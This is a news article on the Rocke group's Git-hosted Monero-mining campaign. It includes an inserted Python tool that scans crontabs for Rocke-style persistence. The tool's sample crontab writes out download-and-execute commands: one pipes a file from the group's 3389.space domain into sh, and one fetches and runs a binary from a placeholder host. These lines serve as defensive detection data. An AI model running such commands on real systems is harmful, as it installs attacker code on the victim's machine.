Rocke threat actor on Monero cryptominer infection campaign

News by Robert Abel

Despite market volatility, Cisco Talos researchers have noticed falling cryptocurrency prices have had little to no effect on cryptomining malware campaigns.


Researchers are warning users of a Chinese-language threat actor named Rocke who has been leveraging Git repositories to infect systems with Monero-mining malware, according to a 30 August blog post.

Rocke has been on their radar since April 2018, when the group began leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems exposed to an Apache Struts vulnerability. Most recently, researchers have spotted the same threat actor engaging in another similar campaign, which gave them more insight into Rocke's methods.

The threat actors actively engage in distributing and executing their malware using various repositories and payloads, along with shell scripts, JavaScript backdoors and ELF and PE miners, researchers said. Rocke also sells a US$ 14 (£11) Monero Silent miner which is advertised as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into "Windows processes to bypass firewalls."

"Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file 'logo.jpg' from '3389[.]space,'" researchers said in the post.

"This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename 'java.' The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if 'h32' or 'h64' is used to invoke 'java.'"
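The persistence mechanism described in the quoted passage (a cron job that fetches a file with an image name and runs it as a shell script, then pulls miner binaries down as "java") is the kind of pattern a defender can hunt for in crontabs. The following is an added example, not code from the Talos post or from the Rocke toolset: a small Python checker that flags cron entries which download-and-execute, fetch an image-named file and pipe it to a shell, or contact the domain the post names (defanged there as 3389[.]space). The sample crontab is constructed for the example; the heuristics and regexes are assumptions and are deliberately simple.

```python
import re
from typing import List, Tuple

# Indicator named in the write-up summarised above (defanged there as 3389[.]space).
# A real deployment would load this set from a threat-intel feed.
KNOWN_BAD_HOSTS = {"3389.space"}

# Heuristics (assumed, not from the article): a download tool on the same line as
# something that executes the download is the classic cron "download-and-execute" shape.
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
SHELL_EXEC_RE = re.compile(r"\|\s*(ba|da)?sh\b|chmod\s+\+x")
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)(/\S*)?")
IMAGE_EXT_RE = re.compile(r"\.(jpg|jpeg|png|gif)\b", re.IGNORECASE)


def classify_line(line: str) -> List[str]:
    """Return the list of reasons a single cron line looks suspicious (empty if none)."""
    reasons: List[str] = []
    has_downloader = bool(DOWNLOADER_RE.search(line))
    executes = bool(SHELL_EXEC_RE.search(line))
    for host, path in URL_RE.findall(line):
        if host.lower() in KNOWN_BAD_HOSTS:
            reasons.append(f"contacts known-bad host {host}")
        # An "image" that is piped into a shell is a script wearing a disguise.
        if IMAGE_EXT_RE.search(path or "") and executes:
            reasons.append("fetches an image-named file and runs it as a script")
    if has_downloader and executes and not any("runs it as a script" in r for r in reasons):
        reasons.append("download-and-execute pattern")
    return reasons


def suspicious_cron_entries(crontab_text: str) -> List[Tuple[str, List[str]]]:
    """Scan crontab text and return (line, reasons) for every flagged entry."""
    findings: List[Tuple[str, List[str]]] = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments carry no command
        reasons = classify_line(line)
        if reasons:
            findings.append((line, reasons))
    return findings


# Constructed sample crontab for the example: two benign jobs and two that match
# the shape described in the article (hostnames other than 3389.space are placeholders).
SAMPLE_CRONTAB = """\
# constructed sample, not captured from a real host
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://3389.space/logo.jpg | sh
@reboot wget -q -O /tmp/java http://example.invalid/h64 && chmod +x /tmp/java && /tmp/java
30 2 * * 0 /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    for entry, why in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"FLAGGED: {entry}")
        for reason in why:
            print(f"    - {reason}")
```

In practice you would feed this the output of `crontab -l` for each user plus the contents of `/etc/cron.d`, and treat a hit on the known-bad host set as a high-confidence alert while the generic download-and-execute hit is a lead for triage rather than proof of compromise.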

The miner's payload appears to be similar to the one used by the Iron Cybercrime Group as they both behave similarly and reach out to similar infrastructure, researchers noted.

Rocke has also been spotted attempting to access cloud storage services and manuals for programming in the Chinese Easy language. Researchers suspect Rocke will continue to leverage Git repositories to download and execute illicit miners onto victim machines, and will also likely adopt social engineering attacks as a new infection vector.
